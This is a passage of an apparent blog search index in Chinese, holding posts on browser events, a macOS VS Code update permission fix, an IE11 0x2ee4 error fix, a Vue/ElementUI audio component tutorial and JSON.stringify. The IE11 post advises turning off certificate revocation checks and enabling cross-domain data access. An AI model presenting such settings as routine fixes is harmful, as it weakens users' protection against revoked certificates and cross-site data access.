方法,将会使用户代理在有机会时异步地向服务器发送数据,同时不会延迟页面的卸载或影响下一导航的载入性能。这就解决了提交分析数据时的所有的问题:使它可靠,异步并且不会影响下一页面的加载。此外,代码实际上还要比其他技术简单!\n注意:该方法在IE和safari没有实现\n使用场景:发送崩溃报告\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } ","permalink":"https://wdd.js.org/posts/2018/02/useful-browser-events/","summary":"1 visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2 storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3 beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4 navigator.","title":"不常用却很有妙用的事件及方法"},{"content":"0. 现象 Could not create temporary directory: Permission denied\n1. 问题起因 在 /Users/username/Library/Caches/目录下,有以下两个文件, 可以看到,他们两个的用户是不一样的,一个是root一个username, 一般来说,我是以username来使用我的mac的。就是因为这两个文件的用户不一样,导致了更新失败。\ndrwxr-xr-x 6 username staff 204B Jan 17 20:33 com.microsoft.VSCode drwxr--r-- 2 root staff 68B Dec 17 13:51 com.microsoft.VSCode.ShipIt 2. 解决方法 注意: 先把vscode 完全关闭\n// 1. 这一步是需要输入密码的 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/ // 2. 这一步是不需要输入密码的, 如果不进行第一步,第二步会报错 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/* // 3. 更新xattr xattr -dr com.apple.quarantine /Applications/Visual\\ Studio\\ Code.app 3. 打开vscode Code \u0026gt; Check for Updates, 点击之后,你会发现Check for Updates已经变成灰色了,那么你需要稍等片刻,马上就可以更新,之后会跳出提示,让你重启vscode, 然后重启一下vscode, 就ok了。\n4. 参考 joaomoreno commented on Feb 7, 2017 • edited ","permalink":"https://wdd.js.org/posts/2018/02/mac-vscode-update-permission-denied/","summary":"0. 现象 Could not create temporary directory: Permission denied\n1. 问题起因 在 /Users/username/Library/Caches/目录下,有以下两个文件, 可以看到,他们两个的用户是不一样的,一个是root一个username, 一般来说,我是以username来使用我的mac的。就是因为这两个文件的用户不一样,导致了更新失败。\ndrwxr-xr-x 6 username staff 204B Jan 17 20:33 com.microsoft.VSCode drwxr--r-- 2 root staff 68B Dec 17 13:51 com.microsoft.VSCode.ShipIt 2. 解决方法 注意: 先把vscode 完全关闭\n// 1. 这一步是需要输入密码的 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/ // 2. 这一步是不需要输入密码的, 如果不进行第一步,第二步会报错 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/* // 3. 更新xattr xattr -dr com.apple.quarantine /Applications/Visual\\ Studio\\ Code.app 3. 打开vscode Code \u0026gt; Check for Updates, 点击之后,你会发现Check for Updates已经变成灰色了,那么你需要稍等片刻,马上就可以更新,之后会跳出提示,让你重启vscode, 然后重启一下vscode, 就ok了。","title":"mac vscode 更新失败 Permission denied解决办法"},{"content":"一千个IE浏览器访问同一个页面,可能报一千种错误。前端激进派对IE恨得牙痒痒,但是无论你爱,或者不爱,IE就在那里,不来不去。\n一些银行,以及政府部门,往往都是指定必须使用IE浏览器。所以,一些仅在IE浏览器上出现的问题。总结起来问题的原因很简单:IE的配置不正确\n下面就将一个我曾经遇到的问题: IE11 0x2ee4, 以及其他的问题的解决方案\n1. IE11 SCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4 背景介绍:在一个HTTPS域向另外一个HTTPS域发送跨域POTST请求时\n这个问题在浏览器的输出内容如下,怪异的是,并不是所有IE11都会报这个错误。\nSCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4, 由于出现错误 00002ee4 而导致此项操作无法完成 stackoverflow上有个答案,它的思路是:在post请求发送之前,先进行一次get操作 这个方式我试过,是可行的。但是深层次的原因我不是很明白。\n然而真相总有大白的一天,其实深层次的原因是,IE11的配置。\n去掉检查证书吊销的的检查,解决0x2ee4的问题\n解决方法\n去掉check for server certificate revocation*, 也有可能你那边是中文翻译的:叫检查服务器证书是否已吊销 去掉检查发型商证书是否已吊销 点击确定 重启计算机 2 其他常规设置 2.1 去掉兼容模式, 使用Edge文档模式 下图中红色框里的按钮也要取消勾选 2.2 有些使用activeX,还是需要检查是否启用的 2.3 允许跨域 如果你的接口跨域了,还要检查浏览器是否允许跨域,否则浏览器可能默认就禁止跨域的\n设置方法\ninternet选项 安全 自定义级别 启用通过跨域访问数据源 启用跨域浏览窗口和框架 确定 然后重启电脑 ","permalink":"https://wdd.js.org/posts/2018/02/ie11-0x2ee4-bug/","summary":"一千个IE浏览器访问同一个页面,可能报一千种错误。前端激进派对IE恨得牙痒痒,但是无论你爱,或者不爱,IE就在那里,不来不去。\n一些银行,以及政府部门,往往都是指定必须使用IE浏览器。所以,一些仅在IE浏览器上出现的问题。总结起来问题的原因很简单:IE的配置不正确\n下面就将一个我曾经遇到的问题: IE11 0x2ee4, 以及其他的问题的解决方案\n1. IE11 SCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4 背景介绍:在一个HTTPS域向另外一个HTTPS域发送跨域POTST请求时\n这个问题在浏览器的输出内容如下,怪异的是,并不是所有IE11都会报这个错误。\nSCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4, 由于出现错误 00002ee4 而导致此项操作无法完成 stackoverflow上有个答案,它的思路是:在post请求发送之前,先进行一次get操作 这个方式我试过,是可行的。但是深层次的原因我不是很明白。\n然而真相总有大白的一天,其实深层次的原因是,IE11的配置。\n去掉检查证书吊销的的检查,解决0x2ee4的问题\n解决方法\n去掉check for server certificate revocation*, 也有可能你那边是中文翻译的:叫检查服务器证书是否已吊销 去掉检查发型商证书是否已吊销 点击确定 重启计算机 2 其他常规设置 2.1 去掉兼容模式, 使用Edge文档模式 下图中红色框里的按钮也要取消勾选 2.2 有些使用activeX,还是需要检查是否启用的 2.3 允许跨域 如果你的接口跨域了,还要检查浏览器是否允许跨域,否则浏览器可能默认就禁止跨域的\n设置方法\ninternet选项 安全 自定义级别 启用通过跨域访问数据源 启用跨域浏览窗口和框架 确定 然后重启电脑 ","title":"IE11 0x2ee4 bug 以及类似问题解决方法"},{"content":"1. 简介 1.1. 相关技术 Vue Vue-cli ElementUI yarn (之前我用npm, 并使用cnpm的源,但是用了yarn之后,我发现它比cnpm的速度还快,功能更好,我就毫不犹豫选择yarn了) Audio相关API和事件 1.2. 从本教程你会学到什么? Vue单文件组件开发知识 Element UI基本用法 Audio原生API及Audio相关事件 音频播放器的基本原理 音频的播放暂停控制 更新音频显示时间 音频进度条控制与跳转 音频音量控制 音频播放速度控制 音频静音控制 音频下载控制 个性化配置与排他性播放 一点点ES6语法 2. 学前准备 基本上不需要什么准备,但是如果你能先看一下Aduio相关API和事件将会更好\nAudio: 如果你愿意一层一层剥开我的心 使用 HTML5 音频和视频 3. 在线demon 没有在线demo的教程都是耍流氓\n查看在线demon 项目地址 4. 开始编码 5. 项目初始化 ➜ test vue init webpack element-audio A newer version of vue-cli is available. latest: 2.9.2 installed: 2.9.1 ? Project name element-audio ? Project description A Vue.js project ? Author wangdd \u0026lt;wangdd@xxxxxx.com\u0026gt; ? Vue build standalone ? Install vue-router? No ? Use ESLint to lint your code? No ? Set up unit tests No ? Setup e2e tests with Nightwatch? No ? Should we run `npm install` for you after the project has been created? (recommended) npm ➜ test cd element-audio ➜ element-audio npm run dev 浏览器打开 http://localhost:8080/, 看到如下界面,说明项目初始化成功\n5.1. 安装ElementUI并插入audio标签 5.1.1. 安装ElementUI yarn add element-ui // or npm i element-ui -S 5.1.2. 在src/main.js中引入Element UI // filename: src/main.js import Vue from \u0026#39;vue\u0026#39; import ElementUI from \u0026#39;element-ui\u0026#39; import App from \u0026#39;./App\u0026#39; import \u0026#39;element-ui/lib/theme-chalk/index.css\u0026#39; Vue.config.productionTip = false Vue.use(ElementUI) /* eslint-disable no-new */ new Vue({ el: \u0026#39;#app\u0026#39;, template: \u0026#39;\u0026lt;App/\u0026gt;\u0026#39;, components: { App } }) 5.1.3. 创建src/components/VueAudio.vue // filename: src/components/VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;audio src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; export default { data () { return {} } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.1.4. 修改src/App.vue, 并引入VueAudio.vue组件 // filename: src/App.vue \u0026lt;template\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; \u0026lt;VueAudio /\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; import VueAudio from \u0026#39;./components/VueAudio\u0026#39; export default { name: \u0026#39;app\u0026#39;, components: { VueAudio }, data () { return {} } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 打开:http://localhost:8080/,你应该能看到如下效果,说明引入成功,你可以点击播放按钮看看,音频是否能够播放 5.2. 音频的播放暂停控制 我们需要用一个按钮去控制音频的播放与暂停,这里调用了audio的两个api,以及两个事件\naudio.play() audio.pause() play事件 pause事件 修改src/components/VueAudio.vue\n// filename: src/components/VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;!-- 此处的ref属性,可以很方便的在vue组件中通过 this.$refs.audio获取该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; @pause=\u0026#34;onPause\u0026#34; @play=\u0026#34;onPlay\u0026#34; src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;!-- 音频播放控件 --\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; export default { data () { return { audio: { // 该字段是音频是否处于播放状态的属性 playing: false } } }, methods: { // 控制音频的播放与暂停 startPlayOrPause () { return this.audio.playing ? this.pause() : this.play() }, // 播放音频 play () { this.$refs.audio.play() }, // 暂停音频 pause () { this.$refs.audio.pause() }, // 当音频播放 onPlay () { this.audio.playing = true }, // 当音频暂停 onPause () { this.audio.playing = false } }, filters: { // 使用组件过滤器来动态改变按钮的显示 transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.3. 音频显示时间 音频的时间显示主要有两部分,音频的总时长和当前播放时间。可以从两个事件中获取\nloadedmetadata:代表音频的元数据已经被加载完成,可以从中获取音频总时长 timeupdate: 当前播放位置作为正常播放的一部分而改变,或者以特别有趣的方式,例如不连续地改变,可以从该事件中获取音频的当前播放时间,该事件在播放过程中会不断被触发 要点代码:整数格式化成时:分:秒\nfunction realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } 要点代码: 两个事件的处理\n// 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.maxTime = parseInt(res.target.duration) } 完整代码\n\u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;!-- 此处的ref属性,可以很方便的在vue组件中通过 this.$refs.audio获取该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; @pause=\u0026#34;onPause\u0026#34; @play=\u0026#34;onPlay\u0026#34; @timeupdate=\u0026#34;onTimeupdate\u0026#34; @loadedmetadata=\u0026#34;onLoadedmetadata\u0026#34; src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;!-- 音频播放控件 --\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.currentTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.maxTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; // 将整数转换成 时:分:秒的格式 function realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } export default { data () { return { audio: { // 该字段是音频是否处于播放状态的属性 playing: false, // 音频当前播放时长 currentTime: 0, // 音频最大播放时长 maxTime: 0 } } }, methods: { // 控制音频的播放与暂停 startPlayOrPause () { return this.audio.playing ? this.pause() : this.play() }, // 播放音频 play () { this.$refs.audio.play() }, // 暂停音频 pause () { this.$refs.audio.pause() }, // 当音频播放 onPlay () { this.audio.playing = true }, // 当音频暂停 onPause () { this.audio.playing = false }, // 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.maxTime = parseInt(res.target.duration) } }, filters: { // 使用组件过滤器来动态改变按钮的显示 transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; }, // 将整数转化成时分秒 formatSecond(second = 0) { return realFormatSecond(second) } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 打开浏览器可以看到,当音频播放时,当前时间也在改变。 5.4. 音频进度条控制 进度条主要有两个控制,改变进度的原理是:改变audio.currentTime属性值\n音频播放后,当前时间改变,进度条就要随之改变 拖动进度条,可以改变音频的当前时间 // 进度条ui \u0026lt;el-slider v-model=\u0026#34;sliderTime\u0026#34; :format-tooltip=\u0026#34;formatProcessToolTip\u0026#34; @change=\u0026#34;changeCurrentTime\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; // 拖动进度条,改变当前时间,index是进度条改变时的回调函数的参数0-100之间,需要换算成实际时间 changeCurrentTime(index) { this.$refs.audio.currentTime = parseInt(index / 100 * this.audio.maxTime) }, // 当音频当前时间改变后,进度条也要改变 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime this.sliderTime = parseInt(this.audio.currentTime / this.audio.maxTime * 100) }, // 进度条格式化toolTip formatProcessToolTip(index = 0) { index = parseInt(this.audio.maxTime / 100 * index) return \u0026#39;进度条: \u0026#39; + realFormatSecond(index) }, 5.5. 音频音量控制 音频的音量控制和进度控制差不多,也是通过拖动滑动条,去修改aduio.volume属性值,此处不再啰嗦\n5.6. 音频播放速度控制 音频播放速度控制和进度控制差不多,也是点击按钮,去修改aduio.playbackRate属性值,该属性代表音量的大小,取值范围是0 - 1,用滑动条的时候,也是需要换算一下值,此处不再啰嗦\n5.7. 音频静音控制 静音的控制是点击按钮,去修改aduio.muted属性,该属性有两个值: true(静音),false(不静音)。 注意,静音的时候,音频的进度条还是会继续往前走的。\n5.8. 音频下载控制 音频下载是一个a链接,记得加上download属性,不然浏览器会在新标签打开音频,而不是下载音频\n\u0026lt;a :href=\u0026#34;url\u0026#34; v-show=\u0026#34;!controlList.noDownload\u0026#34; target=\u0026#34;_blank\u0026#34; class=\u0026#34;download\u0026#34; download\u0026gt;下载\u0026lt;/a\u0026gt; 5.9. 个性化配置 音频的个性化配置有很多,大家可以自己扩展,通过父组件传递响应的值,可以做到个性化设置。\ncontrolList: { // 不显示下载 noDownload: false, // 不显示静音 noMuted: false, // 不显示音量条 noVolume: false, // 不显示进度条 noProcess: false, // 只能播放一个 onlyOnePlaying: false, // 不要快进按钮 noSpeed: false } setControlList () { let controlList = this.theControlList.split(\u0026#39; \u0026#39;) controlList.forEach((item) =\u0026gt; { if(this.controlList[item] !== undefined){ this.controlList[item] = true } }) }, 例如父组件这样\n\u0026lt;template\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; \u0026lt;div v-for=\u0026#34;item in audios\u0026#34; :key=\u0026#34;item.url\u0026#34;\u0026gt; \u0026lt;VueAudio :theUrl=\u0026#34;item.url\u0026#34; :theControlList=\u0026#34;item.controlList\u0026#34;/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; import VueAudio from \u0026#39;./components/VueAudio\u0026#39; export default { name: \u0026#39;app\u0026#39;, components: { VueAudio }, data () { return { audios: [ { url: \u0026#39;http://devtest.qiniudn.com/secret base~.mp3\u0026#39;, controlList: \u0026#39;onlyOnePlaying\u0026#39; }, { url: \u0026#39;http://devtest.qiniudn.com/回レ!雪月花.mp3\u0026#39;, controlList: \u0026#39;noDownload noMuted onlyOnePlaying\u0026#39; },{ url: \u0026#39;http://devtest.qiniudn.com/あっちゅ~ま青春!.mp3\u0026#39;, controlList: \u0026#39;noDownload noVolume noMuted onlyOnePlaying\u0026#39; },{ url: \u0026#39;http://devtest.qiniudn.com/Preparation.mp3\u0026#39;, controlList: \u0026#39;noDownload noSpeed onlyOnePlaying\u0026#39; } ] } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.10. 一点点ES6语法 大多数时候,我们希望页面上播放一个音频时,其他音频可以暂停。 [...audios]可以把一个类数组转化成数组,这个是我常用的。\nonPlay (res) { console.log(res) this.audio.playing = true this.audio.loading = false if(!this.controlList.onlyOnePlaying){ return } let target = res.target let audios = document.getElementsByTagName(\u0026#39;audio\u0026#39;); // 如果设置了排他性,当前音频播放是,其他音频都要暂停 [...audios].forEach((item) =\u0026gt; { if(item !== target){ item.pause() } }) }, 5.11. 完成后的文件 //filename: VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div class=\u0026#34;di main-wrap\u0026#34; v-loading=\u0026#34;audio.waiting\u0026#34;\u0026gt; \u0026lt;!-- 这里设置了ref属性后,在vue组件中,就可以用this.$refs.audio来访问该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; class=\u0026#34;dn\u0026#34; :src=\u0026#34;url\u0026#34; :preload=\u0026#34;audio.preload\u0026#34; @play=\u0026#34;onPlay\u0026#34; @error=\u0026#34;onError\u0026#34; @waiting=\u0026#34;onWaiting\u0026#34; @pause=\u0026#34;onPause\u0026#34; @timeupdate=\u0026#34;onTimeupdate\u0026#34; @loadedmetadata=\u0026#34;onLoadedmetadata\u0026#34; \u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;el-button v-show=\u0026#34;!controlList.noSpeed\u0026#34; type=\u0026#34;text\u0026#34; @click=\u0026#34;changeSpeed\u0026#34;\u0026gt;{{audio.speed | transSpeed}}\u0026lt;/el-button\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.currentTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;el-slider v-show=\u0026#34;!controlList.noProcess\u0026#34; v-model=\u0026#34;sliderTime\u0026#34; :format-tooltip=\u0026#34;formatProcessToolTip\u0026#34; @change=\u0026#34;changeCurrentTime\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.maxTime | formatSecond }}\u0026lt;/el-tag\u0026gt; \u0026lt;el-button v-show=\u0026#34;!controlList.noMuted\u0026#34; type=\u0026#34;text\u0026#34; @click=\u0026#34;startMutedOrNot\u0026#34;\u0026gt;{{audio.muted | transMutedOrNot}}\u0026lt;/el-button\u0026gt; \u0026lt;el-slider v-show=\u0026#34;!controlList.noVolume\u0026#34; v-model=\u0026#34;volume\u0026#34; :format-tooltip=\u0026#34;formatVolumeToolTip\u0026#34; @change=\u0026#34;changeVolume\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; \u0026lt;a :href=\u0026#34;url\u0026#34; v-show=\u0026#34;!controlList.noDownload\u0026#34; target=\u0026#34;_blank\u0026#34; class=\u0026#34;download\u0026#34; download\u0026gt;下载\u0026lt;/a\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; function realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } export default { props: { theUrl: { type: String, required: true, }, theSpeeds: { type: Array, default () { return [1, 1.5, 2] } }, theControlList: { type: String, default: \u0026#39;\u0026#39; } }, name: \u0026#39;VueAudio\u0026#39;, data() { return { url: this.theUrl || \u0026#39;http://devtest.qiniudn.com/secret base~.mp3\u0026#39;, audio: { currentTime: 0, maxTime: 0, playing: false, muted: false, speed: 1, waiting: true, preload: \u0026#39;auto\u0026#39; }, sliderTime: 0, volume: 100, speeds: this.theSpeeds, controlList: { // 不显示下载 noDownload: false, // 不显示静音 noMuted: false, // 不显示音量条 noVolume: false, // 不显示进度条 noProcess: false, // 只能播放一个 onlyOnePlaying: false, // 不要快进按钮 noSpeed: false } } }, methods: { setControlList () { let controlList = this.theControlList.split(\u0026#39; \u0026#39;) controlList.forEach((item) =\u0026gt; { if(this.controlList[item] !== undefined){ this.controlList[item] = true } }) }, changeSpeed() { let index = this.speeds.indexOf(this.audio.speed) + 1 this.audio.speed = this.speeds[index % this.speeds.length] this.$refs.audio.playbackRate = this.audio.speed }, startMutedOrNot() { this.$refs.audio.muted = !this.$refs.audio.muted this.audio.muted = this.$refs.audio.muted }, // 音量条toolTip formatVolumeToolTip(index) { return \u0026#39;音量条: \u0026#39; + index }, // 进度条toolTip formatProcessToolTip(index = 0) { index = parseInt(this.audio.maxTime / 100 * index) return \u0026#39;进度条: \u0026#39; + realFormatSecond(index) }, // 音量改变 changeVolume(index = 0) { this.$refs.audio.volume = index / 100 this.volume = index }, // 播放跳转 changeCurrentTime(index) { this.$refs.audio.currentTime = parseInt(index / 100 * this.audio.maxTime) }, startPlayOrPause() { return this.audio.playing ? this.pausePlay() : this.startPlay() }, // 开始播放 startPlay() { this.$refs.audio.play() }, // 暂停 pausePlay() { this.$refs.audio.pause() }, // 当音频暂停 onPause () { this.audio.playing = false }, // 当发生错误, 就出现loading状态 onError () { this.audio.waiting = true }, // 当音频开始等待 onWaiting (res) { console.log(res) }, // 当音频开始播放 onPlay (res) { console.log(res) this.audio.playing = true this.audio.loading = false if(!this.controlList.onlyOnePlaying){ return } let target = res.target let audios = document.getElementsByTagName(\u0026#39;audio\u0026#39;); [...audios].forEach((item) =\u0026gt; { if(item !== target){ item.pause() } }) }, // 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { // console.log(\u0026#39;timeupdate\u0026#39;) // console.log(res) this.audio.currentTime = res.target.currentTime this.sliderTime = parseInt(this.audio.currentTime / this.audio.maxTime * 100) }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.waiting = false this.audio.maxTime = parseInt(res.target.duration) } }, filters: { formatSecond(second = 0) { return realFormatSecond(second) }, transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; }, transMutedOrNot(value) { return value ? \u0026#39;放音\u0026#39; : \u0026#39;静音\u0026#39; }, transSpeed(value) { return \u0026#39;快进: x\u0026#39; + value } }, created() { this.setControlList() } } \u0026lt;/script\u0026gt; \u0026lt;!-- Add \u0026#34;scoped\u0026#34; attribute to limit CSS to this component only --\u0026gt; \u0026lt;style scoped\u0026gt; .main-wrap{ padding: 10px 15px; } .slider { display: inline-block; width: 100px; position: relative; top: 14px; margin-left: 15px; } .di { display: inline-block; } .download { color: #409EFF; margin-left: 15px; } .dn{ display: none; } \u0026lt;/style\u0026gt; 6. 感谢 如果你需要一个小型的vue音乐播放器,你可以试试vue-aplayer, 该播放器不仅仅支持vue组件,非Vue的也支持,你可以看看他们的demo\n","permalink":"https://wdd.js.org/posts/2018/02/vue-elementui-audio-component/","summary":"1. 简介 1.1. 相关技术 Vue Vue-cli ElementUI yarn (之前我用npm, 并使用cnpm的源,但是用了yarn之后,我发现它比cnpm的速度还快,功能更好,我就毫不犹豫选择yarn了) Audio相关API和事件 1.2. 从本教程你会学到什么? Vue单文件组件开发知识 Element UI基本用法 Audio原生API及Audio相关事件 音频播放器的基本原理 音频的播放暂停控制 更新音频显示时间 音频进度条控制与跳转 音频音量控制 音频播放速度控制 音频静音控制 音频下载控制 个性化配置与排他性播放 一点点ES6语法 2. 学前准备 基本上不需要什么准备,但是如果你能先看一下Aduio相关API和事件将会更好\nAudio: 如果你愿意一层一层剥开我的心 使用 HTML5 音频和视频 3. 在线demon 没有在线demo的教程都是耍流氓\n查看在线demon 项目地址 4. 开始编码 5. 项目初始化 ➜ test vue init webpack element-audio A newer version of vue-cli is available. latest: 2.9.2 installed: 2.9.1 ? Project name element-audio ? Project description A Vue.js project ?","title":"Vue+ElementUI 手把手教你做一个audio组件"},{"content":"1. 语法 JSON.stringify(value[, replacer[, space]]) 一般用法:\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:false,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2. 扩展用法 2.1. replacer replacer可以是函数或者是数组。\n功能1: 改变属性值 将isDead属性的值翻译成0或1,0对应false,1对应true\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return value === true ? 1 : 0; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:0,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能2:删除某个属性 将isDead属性删除,如果replacer的返回值是undefined,那么该属性会被删除。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, 